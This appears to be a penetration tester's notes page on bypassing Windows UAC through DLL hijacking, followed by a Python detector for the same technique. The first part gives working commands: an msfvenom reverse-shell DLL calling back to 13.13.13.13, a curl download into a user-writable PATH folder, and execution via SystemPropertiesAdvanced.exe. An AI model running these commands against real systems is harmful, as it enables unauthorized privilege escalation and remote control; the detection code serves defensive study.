UAC Bypass

About

You can read more about the theory behind UAC here [LINK]

Here you will look more closely at UAC bypasses, because every account, even an elevated one, has two types of token: a low-privilege and a high-privilege one. Sometimes, after we obtain a high-privilege user, we still need to bypass UAC to actually use the high-privilege token. Here I will write about the UAC techniques I used during machines or engagements.

The UACME repository is very useful [LINK]

This repo is also useful [LINK]

UAC Bypass with DLL Hijacking

Review Path Variable (look for a user-writable directory on the PATH; here it is the WindowsApps folder of the user profile)

PS C:\> cmd /c echo %PATH%

Generate Malicious DLL

msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=1337 -f dll > srrstr.dll

Download DLL

curl http://13.13.13.13:1337/srrstr.dll -o "C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Execute Malicious DLL on Target

rundll32 shell32.dll,Control_RunDLL C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Ensure No Existing rundll32 Instances

tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F

Execute SystemPropertiesAdvanced.exe for UAC Bypass

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Verify Elevated Privileges

whoami /priv
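From the defender's side, the steps above leave a distinctive trace: a 32-bit auto-elevating binary (SystemPropertiesAdvanced.exe) loading a DLL from a user profile directory that sits on the PATH. The following is an added example, not code from the page or from any project it links; it runs detection logic over constructed, Sysmon Event ID 7 (ImageLoad) style records (the pipe-delimited format and the sample lines are assumptions, the ven17/WindowsApps path comes from the page) and also audits a PATH string for user-profile entries. The first rule generalizes beyond srrstr.dll to any non-Windows-directory DLL loaded by the auto-elevating binary.

```python
"""Detect the srrstr.dll hijack described above from Sysmon-style image-load records."""

# Constructed sample records shaped like Sysmon Event ID 7 (ImageLoad), pipe-delimited key=value.
SAMPLE_EVENTS = [
    "EventID=7|Image=C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe|ImageLoaded=C:\\Windows\\SysWOW64\\kernel32.dll|Signed=true",
    "EventID=7|Image=C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe|ImageLoaded=C:\\Users\\ven17\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll|Signed=false",
    "EventID=7|Image=C:\\Windows\\System32\\rundll32.exe|ImageLoaded=C:\\Users\\ven17\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll|Signed=false",
    "EventID=7|Image=C:\\Program Files\\App\\app.exe|ImageLoaded=C:\\Program Files\\App\\helper.dll|Signed=true",
]

# Auto-elevating binary abused on this page; extend the set for other UACME-style targets.
AUTO_ELEVATE_IMAGES = {"systempropertiesadvanced.exe"}
# DLLs an auto-elevating system binary should load only from the Windows directory tree.
TRUSTED_DLL_ROOT = "c:\\windows\\"


def parse_event(line):
    """Turn one pipe-delimited key=value record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def is_suspicious_load(ev):
    """True when the record matches the DLL-hijack pattern from the walkthrough."""
    if ev.get("EventID") != "7":
        return False
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    loaded = ev["ImageLoaded"].lower()
    # Rule 1: an auto-elevating binary pulling any DLL from outside the Windows tree.
    if image in AUTO_ELEVATE_IMAGES and not loaded.startswith(TRUSTED_DLL_ROOT):
        return True
    # Rule 2: srrstr.dll loaded from a user profile (covers the rundll32 test step too).
    if loaded.endswith("\\srrstr.dll") and "\\users\\" in loaded:
        return True
    return False


def find_hijacks(lines):
    """Return the parsed records that look like the hijack in progress."""
    return [ev for ev in map(parse_event, lines) if is_suspicious_load(ev)]


def user_profile_path_entries(path_value):
    """Flag PATH entries under C:\\Users (e.g. WindowsApps), which the filtered token can write to."""
    return [p for p in path_value.split(";") if p and "\\users\\" in p.lower()]


if __name__ == "__main__":
    for ev in find_hijacks(SAMPLE_EVENTS):
        print("ALERT:", ev["Image"], "->", ev["ImageLoaded"])
```

Feed it real Sysmon Event 7 data exported in the same key=value shape, and treat a Rule 1 hit as high confidence because the legitimate binary has no reason to load DLLs from a user profile.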
